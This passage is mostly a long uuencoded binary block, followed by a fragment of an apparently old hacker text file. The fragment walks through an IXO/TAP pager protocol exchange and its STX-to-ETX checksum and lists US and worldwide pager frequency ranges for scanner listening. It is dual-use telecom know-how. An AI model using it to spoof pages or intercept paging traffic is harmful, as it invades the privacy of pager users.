MP>!XP?#"_\'PP?S!\<'\P?#!_\'YP?S+_\'CQ__!_'_(_\'XT/_2_\'QP?Y#T MP?_!\'\_P?X!P?/!Y\'P/\'`?'X`>,'X`,'CP?_!P#Y_P?["/CA@<\'AP<`#W M"@\\?'C!\<'_P/!^,'AP>/!R M\<''P?_!W\'_P=_!X'G!\<'_P<,_P<9^?\'!P?_!\3,\?&'!^,'_P?!SY_!_'QPP?'!_\'CPL?!W\'_L M`!QPP>#!Q\'`>,'PPO_!P'@!P?@`P?_!\``/P?!_PO_!_'_!^'\'P?_!X\'[* MPO_"S\+_P?Y_R/_!^-#_TO_!W\'_'\'_P?X_'\'_#\+_P?(?@L'^'P+"_@/!E MP\'_P<(>/\'^'CX<`"/!XX('#@\^?CQQP?^'AAX[P?_!S\''PI\?P?_!\\'[6 MP'CY_!" M_P\,.,'GAX\XP?/"_X8<`,'X`\'_P>``#\'@#G\_P?X/P?X>!\'_A\'^?YX/\ MC\+_P?X?R/_!_M#_V/\_S/\/P??"_W_"_[_"/P\_P?_!S@^$#SY_/@'!_\'&X M!PP\!\'/PO!X\'GP?O!SX\/P?^/CC]WP>?!PQ^.: M/C_!_<'_P?PPPCYGP?W!_X_!_C\,P?Y_!P\>?C_!_\'^/G\?P?X MPO\_P?O!_\''CX?"_Q^,/&?!Y\'_','SPO^?'#QOP>'!_\'C@X?!QPX>/\'\S M!\'"P@_!_P>$#P`'@!_!_\'^'X?!_@_!_P_!_A^/?`_/_]C_/\S_P=_!]\?_( MOP_"_\'O#X'AA]_P?\'P?!$ M]\''AP_!_X\.'V?!QX?C_!_\'^9 M?\'_'\'_'@8>!\3''\+_/\'SP?_!QX^'/\'_'XP.9\''P?\?P??"_\'?'GYGG MP>/!_\3'AQX_P?X'P&'\'_P?X/!GX/P?\'P>8/AWX'S__T$ M_[^?P_^YP_^&/P_"_\''P>0^?\'\#\'OP?_!_`?!^,'WP?_!\`^?P?^`'@1S^ MP?`'A@X^.`'!_\'\.#P^>"'!_\'GCS\,?P?Y^/,'_P?Q^?Q_!_CP/M MP?^!PP/P?_!QX>/P@^'#\'_P?X?'#P?P?P!P>>'\ MA!P`S__U_[_"_\'YP?'#_\'P?\3_P?'!_'_!_"_"_\'X)\'PP??!\<'P/\+_. M@#X`P?/!\`/!P#Y^>"'!_\'X<,'\?'!AP?_!X<'//#C!_,+AO\'\?'C!_\+\E MP?\_P?YXPO_!\<'GP>/!Y\'@?\'YP?PQP?'!_\'CP.?P?_!YX_!YP^/F MP<^/P?_!_,)\>,'_P?#!\<'AP>8X>'#/__3_P?!\,'_P?C!_''!\<'_P>/!) MY\'_P<_!_W_!P,'_PN.0>,'QPO_!P#C!^,'CP?#!_\/SP>`#P?C!_\'X8\'`P MP?!_\'CP?_"S\'?P?_!_GQ_>,'_PO#!_\'@?\+XS__T_\'@?\+_Q MP?AQPO_!_G#&_\'^T/_!^\'_P?S!_\'PPO_!_L/_P?W!_,'_P?QWP?_!^'_!B MX,'XP?S!\&/!X'A\>,'_P?Q\>'_!_L)\<,'PP?'!X\'GP?#!_\'XP?QQP?'!B M_\'CP>?"_\'^?\'XP?G"XWYXP?'"_W!XP?ASP?#!_\+SP?'!X&/!^,'_P?QA2 MP>!CPO_!Y\'_P?-_Q/_!_'A^>,'_PO#!^,'@?\+XS__T_\'QP__!_F_#_\'`> MU?_!W]3_P?O"_\'X7\'@?L+\?\'\/X#!_\'^'P!X0<'QP>/!Y\'PP?_!_'#"! M\<'_P>/"PP_!_P\8P?C!Y\'C'CC!\<+_/AC!^&'!\,'_P>/"\\'!P#!P,'_G\'_P>>?P>.?PL_!W\'_P?YX?SC!_\'P`,'P`G_!^,'\S__Y_\'?" MP_^'U?^?V/\?Q/\_P?\?@\+_'P+!_@/!\\'GP'L MAA_!_PX<&<'GP<<>&,'SP=_!_QX?P</!X?"_\'\C\'/J M'\'_AX_!S\(/PH_!_\'^/G\?PO^?AP8_POY_SO______P_^/Q/_"[S_!_P<_= M!\+OAP_!_\''P?\&#\'_?@?!_\/GAP>'PO_!]X?"C\'_P?!_\'\9 M`<'`#X_!_\''AP\?PX_!_\'^PCX\P?_!_,']AX8?','\?\[______\'CT__!O MY\K_P>!WP>?!_\'\`<'P+\'GP?_!Y\'@PC_!P\'OGG_!_'\@P?C!_\'X8<'@Q M`0AXP?S/_______!X]/_P??*_\'QP?_!Y\'_P?QCP?#!_\'GP?_!]\'PPO_!I MX\'_P?Y_P?[!_\'`P?C!_\'\0<'@8<'`>,'XS_______X?_!]\/_P?W$_\'X$ MPO_!^\'_P?Y_PO_!\,']P?_!_''!\''!X,+XS_______X?_!W];_P?O!_\'Q# MT?______X/_!_A_._S_;_______A_S_J_________\W_________S?______O M___-_]C_P?Y_______+_V/_!_G_,_\'^P__!\______A_]C_P?Y_R?_!W\+_B MP?Y_P?_"\______A_\W_P?(/P<)_P@_!_A_!W\+_P=X_C\'^'\;_C\/_/\'_) MP?/!]\C_P?Y^/\S_G\'_?______'_\W_P>`/A#X.!\'L'P\_P?\./P_!_A\_3 MC\'_C\'_/X_"_\'^/\'_PN?(_\'^?C_,_Q_!_W_!_\'OP__![______!_\W_B MP>>'CQX.!X!\''#Q\&/@?!_@\'P<<_!C_!_\'#P>,/P?\_P?^/) M#S^/P?X^'\'/R_\?P?]_P?_!Q\+_P>?!Q]'_GS_'_Y^/___D_\W_P>/!QP_"7 M'`'"AP8?P?X`/`'!XP\_`#`!P?`&!\'`/P`_P?_!P&`'P?P_P?\`!#^`?#X?$ MC\'_PK_(_Q_#_\'GPO_!Y\''T?\>/L?_GX?#_Y^____?_\W_P?/!\2TX>'G!S MY\'C/[_!_'QXP?C!X<'G/'QP<<'QP>&'@#P@?\'_PN`AP>`_P?["`#\`<#@/( M`,'X""?!_\'@?\'AP?_!^\'YP?L!P__!X<+_PN'1_\'^>,'_P?S%_[^'P_\`] M+\+_P?W__]S_S?_!\\'Q,#C!^'G!Y\'C?\'_POQPP?#!X<'V.,'\<,'PP?'!= MX<''@#AP?\'_PN#!X<'@P?_!_,(`/@!P>!P`P?`P0\'_P>!^P>#!_\+QP?(`C MPO[!X<'@PO_!X<'@P?_!^,+_P?C,_\'^>,'_P?C%_\'^P__!_@!'PO_!^<3_9 MP?[!_\'\P?#,_\'Y___'_\W_P?/!\"!XP?QAP>?!X7_!_\'\P?YP8,'P?GC!& M_'#"^,'AP?XX>,'\?\'_P_'"X\'\.#D^P?@X>'S#<,'QP?_!X,'V,'_!^,+PV M$'QX8,'@8\'_PN!WP?!_P?]P?\'@P?AX=\'P?,'PP?_!^<+_P?YXP?_!^'_!= M^\'\PO_!_G_"_\'^<,/_P?G$_\'\P?_!^&!_P?_!_G_(_\'P?\+_P??"_\'PY M___-_\'CP?(`>,'^`<''P>,_O\'\P?YP`,'P#SC!_G#"^$..``C!_'_!_\+C7 MP?'"Q\'^/\(?P?HX?GQX<'C!\\'_P?!_GC!_\'P?T/!^'X/P?P?P_\?I MP__!^<3_P?C!_\'X`!_!_\'^?\;_#\'_P<`?G\'_P>/!S\'_P/!QQX/!@S!_S_!_\+GP?N`#\'_PQ\`'GX\##W!_`_!_P^&Y M'C_!_,'`CQ\>.7_"Q\'_P/P@X_P?W!PX\>''_!_#X'X MP<,.#QX.?G_!_Q_!_X?!_@'!_A^?P<_!_G_!_'\/PO\_P=_%_Q_!_P^'PO_!" M[X_!_\(/Q_\/QO_!_A^'QO\?YO_-_\'G!P\?PO_"AQ\/P?\^/\'_P<^''L(_+ MP?_!QX>/#\'>P?\_P?_"Y\'_AX_!_Q_"#P8>?CX&/\'_!\'_GX/"#XX>'\'^P<./#QY_P?X<'H>/P@\.] M/\+_#\'_!GX!P<8/!X8>?\'^?X\?GQ\'P?\/P?_!S[\/P?\/P?'\'\P?X_P?_"Y\'WC\+_PA\>#AQ^/`8YP?\'P?^?P<8^/\'\. M!(\?'C'!_\''P>?!_\+'P><'#\'_'XP,,<'PPA^./C_!_,'!CQX\?\'\P?B\? M@\'_GQ\>/,+_![X,<`'!P`\!@!Q_P?Q_CQ^>/P?!X`_!_\'`/@_!_C_!YY_"G M_X_!_P_!Y[_&_X_&_\'##P1^9\'_G\'_/`>?Y?_-_\'P+\'@>,'\(<'@+[_!T M_\'^('PAP>`'/"!YP?G"X8^!/,'\?\'_P>'!X\'QPN_!_\(_G#PX?GS!_\'YO MP?_!\<'_G\'F?#_!_`1//YQPP?_"X\'_PN/!X8`GP?\_P<``<<'X!S_!['P_( MP?C!X,'/'GC!_\'XP?`@8,'_OY^^>,+_`#Q\8<'QP>'!XP/![3Q_P?A]#C^,/ M/"#!X&?!_\'`/`_!_#_!_YQXP>/!S\'_C\'C(<'@P?^AP?@_P>`/P?_!_<3_# MP>/!QSQXP>'!_\'OP?QPP>'![^7_S?_!\,'_P?#!^<'\8<'P?\+_P?Y`?`'!6 M\%=\8''!^,'@P<'!Q\'`/'!YP?_!\<'SP?'!X\+_PC_!V'@X?GS!_,/QP?_!\ MW\'F?'_!_`P./YQPP?_!X\'SP?_"X\'A@,+_/\'`8,'QP?@"O\'D?'_!^,'@7 MP=X>>,'_P?C!\`#!\'_!_Y_!_G#"_P#">&'!\,+CG\'\.,'_P?AP/#^\.,'P% MP>'!Y\'_P<`\/\'\?\'_F'C!X\'/P?^/P>,!@'X`P?!OP<`,'AP?_!Y\'\<,'QP>_E_\W_P?/!_\']P__!^,3_P?#!_\'WP?C"1 M_\'P><'\P?!QP>/!X'S"<,'_P?#!\\'QP>!_P?_"?\'\<#C"?,)XP?#!\<'_0 MP>/!]GQ_P?P\/C_!_GC!^,'CP?/!_\'SP>/!\Q\) M?\'\8,(^>,'_P?C"\,'X=\'_P?Y^<<+_.<'X<''!^,'@P>/!_\'X.,'_P?@@F M?C_!_#C!^&'#_\'^?\'\?\'_O'C!X<'OP?_!X,'C,'!X<,'PP>/!X#Q\>#!@) MP__!X'YXP>!SP>?!_,'PP?G!Y^7_S?_!\]#_P?!_P?_!^'O!X\'PP?\`P?C!> M_\'PP?/!^\'@/\'_PC^>`!Q^'`!YP?!AP?_!X!Y^?\'^#,(?GGC!^,'#P>/!- M_\'CP>?!XY_"_Q_!S,'^P?G!\\'A'\',?'_!_`@?'GC!_\'XP?#!^\'_P/QPXP?!@PO\?P<\_P?Q_P?^>>,'CX MP<_!_P`#'CX8>&'!PQX,?'@88,/_P<9^,,'@`\'GP?C!\<'_P/@/!W MQ\'GP?_!P\''P>>/G\'_#PX>>\'SP>,/CCX_P?X.'QX?!S\'_F M``\>/QY_P`#P/!S\'GAQ_!_P\?#'_![0>/'CX_. MP?\.'QX^?\'\?#[!SX>?PA\'PO\?P?X_P>?!^8_"'P\>?\'^?P\?#AP'?@_!Y M_Q^//\'^/\'_'AO!YX_!_P8/'C\>?\''!Q\./CQ\?G_"_PX_!\'C@X?!_,'`C M!\'/Y?_>_P?D_Y_!_P_$_\+OP<8?P?\&'P?!_\'^!X8?PC_!_P[#'W_!_CX'3 MP<<'C\(?AY_!_Q_!_C\GP>N/P<\?#QY_P?Y_CQ\/'Y_!_X?!_Q^//\'_/\'GF M#P?!QX_!_P_!_Q]_C\'_P<('/PX^/W@.?\+_#C\'P/,'_P?P^`<'@#X_"'X>/P?\_P?X^/ M,<'APL?"'QY_P?Q_CQ\>/<+_P>?!_Q^//\'^/\'G'P/!YX_!_P_!_QY_G,'_; MP<`'/PP^/,'X`'_"_X0_`\'GP?G!Y\'\P>"CP?"_\''P>_!_S_!_B!X8<'AP<<_*!A_P?C!_\'//3PXP?C!Y\'C2 MP?_"OS_!_S_!XY\!P>/!S\'_C\'_/G^8P?_!X<'_/[Q\>,'P8,/_P>!_(<'AC MP?G!X\'XP?'!\,'CY?___]#_/]+_P?C$_\'/Q/_!X,'X0<'P#\'_P<`0P?_!Z M^,'_P<^`/'APP>'!X\'_P=!^?\'_,\'CG\'#P>/!S\/_P?Y_N,'XP>/!]G_!Z M_'QXP?#$_\'@?G'!X<'QP>/!\,'QP?#!X^7____0_W_<_\'PP?AQP?!_P?_!- MX,'XP?_!^,+_P>#"?&'!\&?!_\'@?G_!_\'@=\'_PN/![\/_?GA\>,+S?GS"J M>,'XP?S#_\'@?G'!\<'XP>/!^,'QP?#!\^7____H_S_'_\'YPO_!\<7_P?!S\'_'\'_/P!^<,'QP<<('CAXPOC"7 M_\'/P<(^<<'AP?'!X\'XP?/!\,'CY?___^?_P?X?T__!W\'_G\7_P<8?G\'?F MP?_!W\'_G\'_'X!^`\'P#X`?`#[!_AC"_\''AQX[PL/!Q\'\PO/!Q^7____H# M_S_E_X_!_P_!_@^&'P1_P?X'P>?!_\'&#PQ_P<$'P#PX?#PK"!LH"!L,.PA\/PQ_!W______7_^+_PY\?O MQ`\'#\D&#L(&RP^?O\'?O______%_^C_P=_#C\,/!P\'#\,'QP;&!\0/PX^?I MP_^?PM_"_\'?___W__;_O\'_O\*?K\(/P@["!,(`!,4`!,0`!,(&!\,/CQ^_^ MPO^_PO^____L__W_P_W!\<+PP>#"8,D@Q@#$(,/@8,'@8,'@8,'@P?'!\,+YI MPOW__^/_S?_!_F/!X,'WP?S"]\'@P?_!\,'\P?'!X,'WP?#!^,'\P?/#_\'WZ MZ/_!^<+QP?C!\,'QP_#"X,+PP>#+8$#$8,7PP?'__]S_S?_!_'/!X,'WP?C!/ M\\'WP>#!_\'P?&'!X'?!X,'P?'/!_\'SP?_!\9XP?_!PWS!; M^YO!XQAP>$'!_@'!S@'!\<'_P?/!P'O!\X#!\'_#_\'XP?_!_L'Q]/_"^\'X@ MP?#"0,(`0,8`0,(`0'!@<,'PP?C"^<&\'^`XX+P>/!]\'GP<`_P?<`8!_!_W\_P?X?P?X'G@_&T M_\'?[_^?C@X/#@(.`LH`Q`+"!@\"!@X/PQ___\W_P<\/C\'GCD5.?\'_G\'.+ M'X_!YS_!_\'^/\'^/XX_P>'!Y\'#P?P_P?<>9Q_!_C\?,@_!_P^.#Y_!QC_"4 M[\'_!\'OA\'_?L(/PO\/PO_"#\'_/Y_"_\'?Y?\/CP_"'\ M)XY&!G0_O\',!X?!YG_!\`P!P?\'A\'_P>!GC<'\P?/!XQYGP?_!_#X.<\'S9 MP?^/PY_!S\'_P0_P>0_Q/_![Y_!_[^?P?^_Z_^_G\(/#`3+``0`P@8$!P\?OY^_G[_!T M_\._VO_-_\'GP?'!^&?!S&0$<'^_P>PG@<'F?\'P.`'!_X&`P?#!X&?!R,'XK MP?'!\R!@P?_!^#P,PO'"_\._P>_!_\'LP>'!YGQB?\'X?SY_P?YQP?_!_#TOX MPN'!SC!AP>>@P>/![\'P?"'!X'_!X#W$_\'@.<'@?"/!_\'CP>#!_\'@PO_!P M\<'YV?_!_<[_POW!\,/@Q&#!X,(@`"#%`,8@8,,@PF#!X,/QP?7!_=+_S?_!2 MX,'PP?AAP>!BPS"_\'R?\'QP?C!\<'_P?#!P,'P8&/!P,'XP?'!$ M\P#!\'_!\<'\8,+QQ?_!X,'_P=S!\,'F?&!_P?!_?G_!_G'!_\'X/\'_P?/!0 MX\'B>&#!\\'_P?'!_\'QP?C!\,'@P?_!X,'YP?_!Q\'N?L'P>,'@P?C!\\'\T M8<'@?\'@?F/!X,'P?,'_P?##_\'\P?/1_\'\VO_!^<'PP?C'\,'@P?#!X'!@O MP>#$8'#&8,'@P?#/_\W_P>#!\'APP?ACP>!X?\'_P?S"_\'P?L'QPOC!_L'XA MP>#!^'#!XV#!^,'QP?-PP?#!_\'PO'#"\<7_P>!_P?C!\,'V?&!_P?!_?G_!) M_'#!_\'X?\'_P?/![\'@>&#!]\'_P?!_P?'"^,'WP?_!\<'YP?_!Y\'\?,+X4 MP>#!^,'_P?QQP>#!_\'@?'/"\'S!^<'@?\+_P?AQT?_!_.#_P?O!^<']POG%& M^,3PP?C#\'#!\,-@S__-_\'L`<'`,'$7 M>&/!PP#!^,'QP?-\<\'_P?`<<'/!\<'_P]^?P>'!_\'

)&?F)_P?`_?@/!1 M_G`?P?C!W[_!\\'/P>(`8&.!P?A_P?#!^<'\9\'?P>/!V<'_`\'.'L'\P?G!) MY\'XP?_"^,''P=_!Y\'&PO_!\\'X><'@'X_!S\'X`-'_P?W!_\'QP?_!_L'[8 M[__!^\'XP?G/_\W_P<\'@GH>P>^/@'_!P!_!_Y_!YX)R'L+^'8X>)X<.?\'[5 MP<<^9\'_P>`.,'/!\\'_Q)_!S\'_GD8&?D9_P>(?/@_!_@(?P?G"'\''C\'FP M`$('`L'\/\'P&<'^1Q_![Q_!_P?!SA[!_L'YP/___!_\[_G\7_P<_&_X_!_@_"_P?!SP9O0 MP<_"/\'^#SYG'\'GCCPSA\'_PH^?'\'/P?^.9P\^!S]`'\(_P?XOP?_!^`\?U MP>>/P<8.9P_"?\'_#\'_9A_!* MY\'./C1Q\'#\(_P?XGP?_!X@\?P>>/A@Y'!X_!C M_L'_P?>_P?X''\'''\'_!\'.#\+_ASX/PO\&'\'/AL('P<8>'\*/!X>?'S_2P M_P\^'\(/___!_^C_O\+_'\/_P?P/P?_!WY^_A<'`/Y[!_XX!P>>,PL\_#\'^[ M?\'_P>>/G\'GP<>&/F>'G\'^P?_!]\']P?[!QY_![\'_P?X!P?!Q@\'P>0\B<'/C@>/G\(_TO^?/A^/'___P?_O_\']Q?_!@ MX<'@/\+_P>\!P??!X<'OPO\AP?[!]\'_P>?![\'_P>?!X(Y\8\'GN<'\P?_!& M\\'XP?G!Y\'_P>_!^<'\(,'NP?#!_,'YP>?!^,'_P?C!_<'GO\'GP>3!_[_!J MX<'XP>'![\',(\'YO\(_T/_!_<'_OSR?P?\____!__7_P?/!^<3_P??!_\'S+ MP__!\?!_\'GP?C!_,'PP>S!: M\,+XP>?!^,'_P?C!\<+_P>/!Y,+_P?/!^,'AP?_!T`'!^#_!_W_0_\']PO_!+ M^,+_P<#__\'____*_\'XQ/_!\,'\P?_!\\'^<8^!\'_P?`?P?O!PAO!_Y\?K MPC_2_QX8#Y\?___!____Z_\?P?_![W_!_\'?/[\_TO\>/P>/#___P?____/_R M/]+_#V?!YY\/___!_______%_\']P?^'P_^$___!_______%_\']___'____G M___%_\']___'_______%_\']___'_______%_\']___'_________\W_____L M____S?_________-_______%_\']___'_______%_\']___'_______%_\']1 M___'_______%_\']___'_______%_\']___'_________\W_________S?__W M_______-_______%_\']___'_______%_\']___'_______%_\']___'____% M___%_\']___'_______%_\']___'_________\W_________S?_________-] M_______%_\']___'_______%_\']___'_______%_\']___'_______%_\']` M___'_______%_\']___'_________\W_________S?_________-________T M_\W______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7__ MP?W__\?_________S?_________-_________\W______\7_P?W__\?_____\ M_\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?_P M________S?_________-_________\W_________S?______Q?_!_?__Q___5 M____Q?_!_?__Q_______Q?_!_?__Q_______Q?_!_?__Q__________-____$ M_____\W_________S?_________-_______%_\']___'_______%_\']___'] M_______%_\']___'_______%_\']___'_________\W_________S?______O M___-_________\W______\7_P?W__\?______\7_P?G__\?_SO_!^?__]?_!2 M_?__Q__._\'YP?O___3_P?W__\?_S?^&`@`"`,D"Q`8.Q1\/P=______Y?_-X M_X\'Q08.Q@;$!,(&PP\.PP\?G______B_]#_P=_"G\/_P<^_G\*/#X_&#\T'0 MQ0_"C\.?P?^/_____]#_X/^_PO^_PH\/!L0$QP`$P@8'P@^/GX^______\__J M[/_!_<+YPO'!^,'QP?#!X"#!X,(@P@#)(,)@P?'!X<'@P>'!\<']]__!_?__$ MQ__S_\'[QO#!X,'PP>#&8$!@0,)@P>!@P>#!\,+QP?#!_\']\O_!_?__Q__-Q M_\'\P?_!\<3_P?/!_\'PP?S!^\'YP?_!^<'XP?W?_\+]P?_"^'!K M_\'AP?#!_>O_P?/!\,)@0'#$0,8`0&!`PG#!^&#"X,/PP?O!_\+[VO_!^?__A MQ__-_XX'!L''CL''P<\.P?^&'`<&P(P@_##LD"`,("Q@8/#A^?P=___];_S?\,#PY/CD>/#\'_CQ["N M#XX.9QP''`_!_W_!_\'^/SX/PO_!_@^/P?X/C\+_'^;_G\+?GQ_'#\,.R`8.- M!@\'Q0_#'\'_O___S?_-_XX?#\''CD>./\'_'X_!_Q_!SA_!Y\'_P?>_C\'^G M/\'^?L(_C\'_P>?!_P>&,P\'P<8>!\'_P<_![\'_!\'_P<_"_X_"_\'/ZO_#9 MC\(/C\0/P@?$!@?"!L,'PP^/P@_"CY_!W___P?_-_XP_#\''C&&&?\'_/XS!6 M_Q_!SG_!Y\']P?/!_<'_P?P]P?A^/CS"_\'AP?F'C#`'#\'`'`?!_X_!Y\'OO M`\'_A<+_A\+_P<;&_[_!_[_J_[^?CP["!@`$QP`$P@#"!,(&P@___\W_P#!YXC!X,'D<,'_O\'L)@'!Y,'_P>!XP>'!^,'_P?@YP?!^PCS"_\'@P?G!B M\;\QP>,_P>/!^,'SP?_!Q\'AP>_"^<'OP>;_% MS?_!W,'CP>#!Y\'8P>#!P'#"_\'L8@#!Y,'_P>!P8\'X?\'X><'P?,(XPO_!/ MX,'YP?'!_\'QP>-_P>/!^,+_P,'_P?AGP>;!^'#!\\'QP?_!S\'Y@ MP?'!Q\'F(,'P>&/Y_\'XP?G'\,'@8,'@Q6!`PV#%0,(`0&!PP>!@PN#$\,+Q2 MPO#<_\W_P?G!\<'X9\'XP>8@>,+_P?S!_GG!Y,'^P?#!^,'SP?[!X\'XP?'!2 M\'QP>'_!_\'@><'YP?_!\&,PP?#!^'_!_\'QP?#![GQ_P?Y@P>9^>,'SPO_!R MX\'XP?'!Y\'F>,'QP?C!\?__Q?_!^<'PP?S!\,'YP?C!\,/XS?##<&!PQ&!P; M8,)PPO##^=/_S?_!R<'SP?QGF,'F`'Q_/\'3!_L'CP?C!\\'_P>/!! M^<'!P>`^0#AOP?_!P'G!^;^P`P#!\'@/P?^QP>#![WY_P?Y@P<9^>,'SP=_!B M_\'#N<'QAX9XP?/!^,'S___:_\'[P?_!^\'PP?/!X,'PPF##0,4`0,)@<,'Y[ MP?O0_\W_PP<>&''^/'L'_'\'.'F?!_\'[P?_!]\'_P<'!PA[!PSS"4 M_X`[P?N?$X_PO_!Y\'_P>.''L''< M/\+_A#_!_Y\WP<\?P?\?A\'^`<'O#\(_AT<.?QL7A\'_#QW!_X,-\'G#\''F<'QP?X(P>\//G^?P>?![CX[@Y_!_YP=P?N0+QS!Z MY\'\!______"_]S_P?W)_\'\8\+_P?AGP>#!^\'S`,'@."'"_,'OP<\@PO_"` MYSAYP>/"_\'\.,'QF&=\P?/!^,'S_____\+_ZO_!^,'_P?'!_\'WP>#!\'QG4 MPOS!_\'O8,+_PO?!X,'[P>/!X,'_P?YXP>'!^,'F>,'SP?#!\______"__?_W MP?O$_\'PP?O!\\'@P?_!_L'X8\'XP?9PP?#!^,'S_____\+____!\,+_P?X?$ MP?W!_P#!\#G!^______"____Q/_!W\+_P=_!_A______P__________-____J M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_-_\,/PA_"GS_!_\*?______3_' MS?_#!\4/Q(_$G\'_G[_"W______J_\W_CL($T``$`,,$`,(&P@["#Q^_G[_"R M_\*______]C_S?_!^,'PP>!@Q"!@Q2``(,H`PB``PR#!X&!QP?#"X<'QP_W_@ M____U?_8_\'[PO_!^\'_P?G!_\'PP?',\&#"X,1@0,1@P>#!\,'@Q?#_____F MR__@_\']P?_!_<'XP?W#^,'YP?S"^,3PQ'!@<,1@<&#"<&##<,'XPOG!_?__G M___&__O_P?O!^,/P8,'`0,@`PF#!\&!XP?#!^?__^?_]_\+?PI^/#L("``+%. M`,,"!@(.'@^?PM____3____)_[^?Q0\.PP\.R`8.!LH/PA_!_\'?P[___]S_7 M___,_X^?PX\/CP^/#\,'QP8'PP;%!\0/C\(/C___V____]S_O\'_OY^_P?^/' MP@\&Q`3'``0`!`7"#Y\?PK___]'____A_\']P?O"_\']POE@P?#!X,)@QB#"1 M`,4@8,'AP>#"\#!\,)@\ MP>#(\,'QP_#!\\'YP__!^>W____"_\'^<\/_P?GM_\3XPO!PP?!PP?##<,I@I M<,5@QW#&\,+XP?#!_\'YP?O!_<'YY/___\+_P?1SP__!P'_!_<+_P?G!\'_!D M_`'&_\'XZ__"^<'_P?O!^,'[P?_!^\'XPO!PPD#"8,-``,=`S`##0,'@<,'[< MP?G:____PO_![G_#_XX_Q/_!\'_!_@/&_\'^'_;_PI_"WY\?P@X>#QX?'A\.< MP@8"#L4"Q0#"`@#"`@X?#\*?U?___\+_P,P<9_P>1@?\'^0 M'X3!P#@<9,'GP?_!]\'_G[\?P?\^/\'/G\'_P?Y_CG_$_\'?Q/\`Q?\'P?_!& M[\'_P>?^_Y_"O\_____"_\'OP>&`8'^`<\'(P<'_P?O!_\']Q?\PQ/_!_B'!_\'CK MP?_!X,3_P?G__\S____"_\'OP?B`P>#!_\'0<\'HP#!_L'_P?QSP#!_\'XP?9_P?_!_,+FP?_!^''"X,+P/<'_P?C"_\'\# MPO!_P?_"^,'_P?'!_\'@?\/_P?#!Y___R____\+_P>S!^,+PP?_!^'/!^,'@Z M?\'@PO_!_'-`?F`YP?AGP?!C<<'XP>#!_\'XP?Y_P?_!_,'^P?;!_\'P<<'PQ MP>#!\'`]P?YX?\'_P?S"\#Y_P?C!^<'_P?'!_\'\?\'YPO_!\,'G___+____* MPO_!S''!V,'APO\SP<'8!E_!" M\<'F?\'_P?S!\,'F?X#!Y[S!W\'@(\'(P>9YP=_!_P#!X&'!S&?!^<+_P>/!/ M_\+?P?!X?\'SP>?!S\'_P>?!\G___\;____"_\'.`X_!SG\?$PS!S\'_@'^?F MP?[!_Q_!SP?!^\'&9\'[P<<[G`X?P>?!YG^?P=[!YL'.?X?!YQX?P<8'C\'&Z M.9_!_P+!W@>>'\/_A\'_PI_!PG@?P??!QP_!_P<&'P]____$____PO_!SP_!K MS\'OP?^?/@_!QG_!_V8?PO^.PY_V MG\'O'@_!Q@^/P<=X#\'_#\'L#Y\/P_^'P?_"C\'/'X_!_@8'/P?"#@8_PO^'P<8O'XXGP?_!YP?"CX?!_X]_P<\.=\'.& M?Y_![QX/P<\/C\''?Q_!_Q_!Q@^?#\/_!\'_PH_!SY^/P>(&!R<'P@X''___C MQ/___]3_?\'G?\'_P?<#G`X/P?P?P?_!QA[!\\'N?Y_!YXR.P<<+_R MOXPGG\''P_\0P?^?C\'/EX_!\00#!@,^'@'"X'`\P>9XP__!P&?!_<'GP?S!^,'_<,/_P>^QP>_!- M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_& M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1 M/___Q/______R/]____$_________\W_________S?_________-________S M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2 MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/' MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P ID= PG1 Processing - Please Wait ACK [p 123 ABC 17; ACK EOT The checksum data came from: STX 000 0010 1 011 0001 2 011 0010 3 001 0011 000 1101 A 100 0001 B 100 0010 C 100 0011 000 1101 ETX 000 0011 ---------------- 1 0111 1011 ---------------- 1 7 ; Get it? Get an ASCII chart and it will all make sense. Note: Everything in the paging blocks, from STX to ETX inclusive are used to generate the checksum. Also, this is binary data, guys...you can't just type at the ID= prompt and expect to have it recognized as IXO. It wants specific BITS. Got it? Just checking... ** PAGER FREQUENCIES - US ** [Frequencies transmitting pager information are extremely easy to identify while scanning. They identify each batch transmission with a two-tone signal, followed by bursts of data. People with scanners may tune into some of the following frequencies to familiarize themselves with this distinct audio.] Voice Pager Ranges: 152.01 - 152.21 453.025 - 453.125 454.025 - 454.65 462.75 - 462.925 Other Paging Ranges: 35.02 - 35.68 43.20 - 43.68 152.51 - 152.84 157.77 - 158.07 158.49 - 158.64 459.025 - 459.625 929.0125 - 931.9875 ** PAGER FREQUENCIES - WORLD ** Austria 162.050 - 162.075 T,N,A Australia 148.100 - 166.540 T,N,A 411.500 - 511.500 T,N,A Canada 929.025 - 931-975 T,N,A 138.025 - 173.975 T,N,A 406.025 - 511.975 T,N,A China 152.000 - 172.575 N,A Denmark 469.750 N,A Finland 450.225 T,N,A 146.275 - 146.325 T,N,A France 466.025 - 466.075 T,N,A Germany 465.970 - 466.075 T,N,A 173.200 T,N,A Hong Kong 172.525 N,A 